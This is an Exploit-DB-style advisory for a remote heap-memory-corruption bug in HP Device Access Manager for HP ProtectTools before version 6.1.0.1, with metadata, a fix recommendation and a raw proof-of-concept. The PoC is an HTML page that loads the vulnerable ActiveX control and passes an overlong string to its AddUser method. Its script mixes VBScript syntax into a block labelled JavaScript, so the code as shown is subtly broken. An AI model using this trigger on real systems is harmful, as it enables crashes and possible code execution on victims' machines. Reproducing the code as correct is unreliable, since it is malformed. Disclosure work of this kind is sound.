Remote Heap-Memory-Corruption Vulnerability in HP Device Access Manager for HP ProtectTools

vendor:

HP Device Access Manager for HP ProtectTools

by:

7.5

CVSS

HIGH

Heap-Memory-Corruption

119

CWE

Product Name: HP Device Access Manager for HP ProtectTools

Affected Version From: Prior to 6.1.0.1

Affected Version To:

Patch Exists: YES

Related CWE:

CPE: a:hp:device_access_manager_for_hp_protecttools

Metasploit:

Other Scripts:

Platforms Tested:

Remote Heap-Memory-Corruption Vulnerability in HP Device Access Manager for HP ProtectTools

The HP Device Access Manager for HP ProtectTools is prone to a remote heap-memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Update to HP Device Access Manager for HP ProtectTools version 6.1.0.1 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50895/info

HP Device Access Manager for HP ProtectTools is prone to a remote heap-memory-corruption vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

HP Device Access Manager for HP ProtectTools versions prior to 6.1.0.1 are vulnerable.

<HTML>
<BODY>
<object id="target"
classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object>
<SCRIPT language="JavaScript">
function Do_It()
{
arg1=String(1044, "X")
target.AddUser arg1
}
</SCRIPT>
<input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>